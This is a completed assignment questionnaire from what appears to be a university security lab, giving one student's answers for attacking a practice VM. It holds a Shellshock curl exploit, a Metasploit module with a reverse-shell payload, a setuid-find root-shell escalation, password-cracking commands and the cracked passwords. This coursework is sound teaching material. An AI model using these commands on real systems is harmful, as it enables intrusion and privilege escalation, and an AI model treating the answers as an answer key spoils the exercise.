Assignment Questionnaire
========================

NOTE: DO NOT DELETE --> and <--, and place your answers within the marks.
  Example:
    -->
      130.207.7.210, scouter.cc.gatech.edu
    <--


Info
====

Example:
  Your GT Login ID: kpark21
  Your Name: Kyuhong Park

-->
  Your GT Login ID:  imalik30
  Your Name: Irfan Malik
<--

Task 1
=======

1. What is the IP address of the vulnerable VM on the NAT network?

Example:
  IP : 10.0.2.3
-->
  IP : 10.0.2.4
<--


2. Which port receives http traffic on the vulnerable VM.

Example:
  Port : 73

-->
  Port : 80
<--

3. List each port whose service name is shown as "unknown", and the message obtained by connecting to that port.

Example:
  Port : 64
  Answer : 1234567
  Port : 34
  Answer : 456789
  ...

-->
  Port : 9095
  Answer : 1307941078
  Port : 9096
  Answer : 1766490697
  Port : 9097
  Answer : -972928378
  Port : 9098
  Answer : 73401510
  Port : 9099
  Answer : 2027631930
<--


Task 2
=======

1. What command did you use to exploit the shellshock vulnerability?

Example:
  Command : curl http://10.0.2.1:6262/cgi-bin/shellshock.cgi

-->
  Command : curl -H 'User-Agent: () { :; };   /bin/task2 imalik30' bash -s :'' http://10.0.2.4:80/cgi-bin/shellshock.cgi
<--


2. What hash value is returned by running ./bin/task2 with your student ID.

-->
  Hash : c08a0d15d854a635ce4e1594862d0f7ed8ec747255703192e7d7d1d975678f39
<--


Task 3 
=======

1. Give the full name of the exploit module you used.

Example:
  Module : auxiliary/scanner/portscan/tcp

-->
  Module : exploit/multi/http/apache_mod_cgi_bash_env_exec
<--


2. Give the full name of the payload you used:

Example:
  Payload : auxiliary/scanner/portscan/tcp

-->
  Payload : linux/x86/shell_reverse_tcp
<--


3. What hash value is returned by running ./bin/task3 with your student ID.

-->
  Hash : 3aabeef1e90b3d8c26a38e11f22805822ea25076f17ad3e9975faa27e2edd541
<--


Task 4
=======

1. What command did you use to find the program with the vulnerable setUID bit (assume the command is being rurn from the /usr/bin directory).

Example:
  Command : find . php

-->
  Command : find /usr/bin -perm -u=s -type f
<--


2. Give the name of the vulnerable program in /usr/bin. 

Example:
  Program : passwd

-->
  Program : find
<--


3. What command did you use to exploit the setUID vulnerability to spawn a shell.

-->
  Command : find /usr/bin -exec /bin/sh \;
<--


4. What hash value is returned by running ./bin/task4 with your student ID.

-->
  Hash : 2d64d33c0317f34664a40464c5521b2321541c4bd53afba922268c7b4abbd31e
<--


Task 5
=======

1. Give the John the Ripper command you used to find the password of task51.zip.

-->
  Command : john --incremental task51hash
<--


2. What is the password for task51.zip.

Example:
  Password : 1234

-->
  Password : zhsvf
<--


3. What hash value is returned by running python task51.pyc with your student ID.

-->
  Hash : df1e0823463d52c3bfc309db7608bd5d395852e4f2d93f6a41a81a569903b6e1
<--


4. Give the cewl command you used to create your wordlist.

-->
  Command : cewl -d 13 -w wordlist  http://10.0.0.4/cgi-bin/shellshock.cgi
<--


5. Give the John the Ripper command you used to find the password of task52.pyc.gpg.

-->
  Command : john --wordlist="wordlist.txt" --rules task52hash
<--


6. What is the password for task52.pyc.gpg.

-->
  Password : Chlorophyll8
<--


7. What hash value is returned by running python task52.pyc with your student ID.

-->
  Hash : 9dbcf5594361f8dca4d43d5c19e0d4cd1aa5e9b8a385be514b8bd79b7994b45c
<--